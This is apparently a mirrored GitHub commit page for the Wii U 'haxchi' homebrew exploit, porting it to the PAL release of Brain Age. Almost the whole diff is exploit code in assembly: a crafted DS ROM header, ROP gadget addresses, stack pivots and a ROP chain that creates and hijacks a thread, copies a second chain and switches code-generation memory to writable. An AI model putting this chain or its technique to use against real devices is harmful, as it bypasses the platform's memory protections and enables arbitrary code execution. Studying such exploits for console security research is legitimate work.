mirror of
https://github.com/wiiu-env/haxchi.git
synced 2024-11-05 00:05:05 +01:00
ported over to the pal version of brain age
This commit is contained in:
parent
37443ff760
commit
73c327adf2
6
haxchi.s
6
haxchi.s
@ -1,7 +1,7 @@
|
||||
.create "haxchi.srl", 0
|
||||
.nds
|
||||
|
||||
hax_target_address equ 0x107968AC
|
||||
hax_target_address equ 0x1076FAA4
|
||||
code_target_address equ (0xF4000000 + 0xFD2000)
|
||||
|
||||
.org 0x000
|
||||
@ -15,11 +15,11 @@ code_target_address equ (0xF4000000 + 0xFD2000)
|
||||
.org 0x020
|
||||
.word arm9_data ; ARM9 rom_offset
|
||||
.word 0x20000000 ; ARM9 entry_address
|
||||
.word 0xEBBC0E00 + code_target_address ; ARM9 ram_address
|
||||
.word 0xEBDDFC00 + code_target_address ; ARM9 ram_address
|
||||
.word arm9_data_end - arm9_data ; ARM9 size
|
||||
.word arm7_data ; ARM7 rom_offset
|
||||
.word 0x2000000 ; ARM7 entry_address
|
||||
.word 0xEBBC0E00 + hax_target_address ; ARM7 ram_address
|
||||
.word 0xEBDDFC00 + hax_target_address ; ARM7 ram_address
|
||||
.word arm7_data_end - arm7_data ; ARM7 size
|
||||
|
||||
.org 0x080
|
||||
|
51
haxchi_rop.s
51
haxchi_rop.s
@ -1,23 +1,23 @@
|
||||
MAIN_STACKTOP equ (0x30796C00)
|
||||
CORE0_STACKORIG equ (0x2B566050) ; TEMP ?
|
||||
CORE0_ROPSTART equ (CORE0_STACKORIG + 0x2054) ; TEMP ?
|
||||
CORE0_STACKORIG equ (0x2B267B50) ; TEMP ?
|
||||
CORE0_ROPSTART equ (CORE0_STACKORIG + 0xAFC) ; TEMP ?
|
||||
RPX_OFFSET equ (0x01800000)
|
||||
COREINIT_OFFSET equ (- 0xFE3C00)
|
||||
LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02207084)
|
||||
MTCTR_R28_ADDI_R6x68_MR_R5R29_R4R22_R3R21_BCTRL equ (RPX_OFFSET + 0x02206FA8)
|
||||
BCTRL equ (RPX_OFFSET + 0x02206FBC)
|
||||
MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A3610)
|
||||
LWZ_R0x104_MTLR_R0_ADDI_R1x100_BLR equ (RPX_OFFSET + 0x020E92C8)
|
||||
LWZ_R0x2054_MTLR_R0_ADDI_R1x2050_BLR equ (RPX_OFFSET + 0x02026DE0)
|
||||
LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020ACA38)
|
||||
MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x02179168)
|
||||
LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02277B44)
|
||||
LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02208F6C)
|
||||
MTCTR_R28_ADDI_R6x68_MR_R5R29_R4R22_R3R21_BCTRL equ (RPX_OFFSET + 0x02208E90)
|
||||
BCTRL equ (RPX_OFFSET + 0x02208EA4)
|
||||
MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x0209A500)
|
||||
LWZ_R0x104_MTLR_R0_ADDI_R1x100_BLR equ (RPX_OFFSET + 0x020E0108)
|
||||
LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x0209A12C)
|
||||
LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020A38AC)
|
||||
MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x0216FBF0)
|
||||
LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02279BB8)
|
||||
MTCTR_R30_MR_R8R21_R7R29_R6R28_R5R27_R4R25_R3R24_BCTRL equ (COREINIT_OFFSET + 0x02002968)
|
||||
|
||||
NERD_CREATETHREAD equ (RPX_OFFSET + 0x022219E8)
|
||||
NERD_STARTTHREAD equ (RPX_OFFSET + 0x02221E04)
|
||||
HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006CC8)
|
||||
HACHI_APPLICATION_PTR equ (0x10c8c938)
|
||||
NERD_CREATETHREAD equ (RPX_OFFSET + 0x02223C40)
|
||||
NERD_STARTTHREAD equ (RPX_OFFSET + 0x0222405C)
|
||||
HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02007774)
|
||||
;HACHI_APPLICATION_PTR equ (0x10A6E038) ;probably wrong
|
||||
|
||||
OS_CREATETHREAD equ (0x02025764 + COREINIT_OFFSET)
|
||||
OS_GETTHREADAFFINITY equ (0x020266A4 + COREINIT_OFFSET)
|
||||
@ -27,15 +27,15 @@ OSCODEGEN_SWITCHSECMODE equ (0x0201B2C0 + COREINIT_OFFSET)
|
||||
MEMCPY equ (0x02019BC8 + COREINIT_OFFSET)
|
||||
DC_FLUSHRANGE equ (0x02007B88 + COREINIT_OFFSET)
|
||||
IC_INVALIDATERANGE equ (0x02007CB0 + COREINIT_OFFSET)
|
||||
SYS_LAUNCHSETTINGS equ (0x03B9B25C)
|
||||
_EXIT equ (0x0229a240 + RPX_OFFSET)
|
||||
exit equ (0x022924b0 + RPX_OFFSET)
|
||||
;SYS_LAUNCHSETTINGS equ (0x03B9B25C)
|
||||
;_EXIT equ (0x0229a240 + RPX_OFFSET)
|
||||
;exit equ (0x022924b0 + RPX_OFFSET)
|
||||
|
||||
OSFATAL equ (0x02015218 + COREINIT_OFFSET)
|
||||
|
||||
CODEGEN_ADR equ 0x01800000
|
||||
|
||||
NERD_THREADOBJECT equ (0x107968AC - 0x1000)
|
||||
NERD_THREADOBJECT equ (0x1076FAA4 - 0x1000)
|
||||
|
||||
.macro set_sp,v
|
||||
.word LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR
|
||||
@ -134,7 +134,7 @@ NERD_THREADOBJECT equ (0x107968AC - 0x1000)
|
||||
|
||||
|
||||
|
||||
.create "haxchi_rop_hook.bin", 0x107968AC
|
||||
.create "haxchi_rop_hook.bin", 0x1076FAA4
|
||||
.arm.big
|
||||
|
||||
rop_hook_start:
|
||||
@ -150,10 +150,9 @@ rop_hook_start:
|
||||
.arm.big
|
||||
|
||||
rop_start:
|
||||
|
||||
; call_func HACHI_APPLICATION_SHUTDOWNANDDESTROY, HACHI_APPLICATION_PTR, 0, 0, 0
|
||||
|
||||
; call_func SYS_LAUNCHSETTINGS, 0, 0, 0, 0
|
||||
;call_func HACHI_APPLICATION_SHUTDOWNANDDESTROY, HACHI_APPLICATION_PTR, 0, 0, 0
|
||||
;call_func OSFATAL, 0x1007E7A8, 0, 0, 0
|
||||
;call_func SYS_LAUNCHSETTINGS, 0, 0, 0, 0
|
||||
; call_func exit, 0, 0, 0, 0
|
||||
; call_func _EXIT, 0, 0, 0, 0
|
||||
; .word _EXIT
|
||||
@ -163,13 +162,15 @@ rop_start:
|
||||
; .word 0xDEADBABE ; garbage
|
||||
; .word 0xDEADBABE ; garbage
|
||||
; .word 0xDEADBABE ; garbage
|
||||
call_func_6args NERD_CREATETHREAD, NERD_THREADOBJECT, LWZ_R0x2054_MTLR_R0_ADDI_R1x2050_BLR, 0xDEAD0DAD, thread_param, 0x0, 0x0
|
||||
call_func_6args NERD_CREATETHREAD, NERD_THREADOBJECT, LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR, 0x1007E7A8, thread_param, 0x0, 0x0
|
||||
call_func OS_GETTHREADAFFINITY, NERD_THREADOBJECT, 0, 0, 0
|
||||
call_func MEMCPY, CORE0_ROPSTART, core0rop, core0rop_end - core0rop, 0x0
|
||||
call_func NERD_STARTTHREAD, NERD_THREADOBJECT, 0x0, 0x0, 0x0
|
||||
;call_func DC_FLUSHRANGE, 0x1076EAA4, 0x1000, 0x0, 0x0
|
||||
call_func BCTRL, 0x0, 0x0, 0x0, 0x0 ; infinite loop
|
||||
|
||||
core0rop:
|
||||
; .word OSFATAL
|
||||
; switch codegen to RW
|
||||
call_func OSCODEGEN_SWITCHSECMODE, 0x0, 0x0, 0x0, 0x0
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user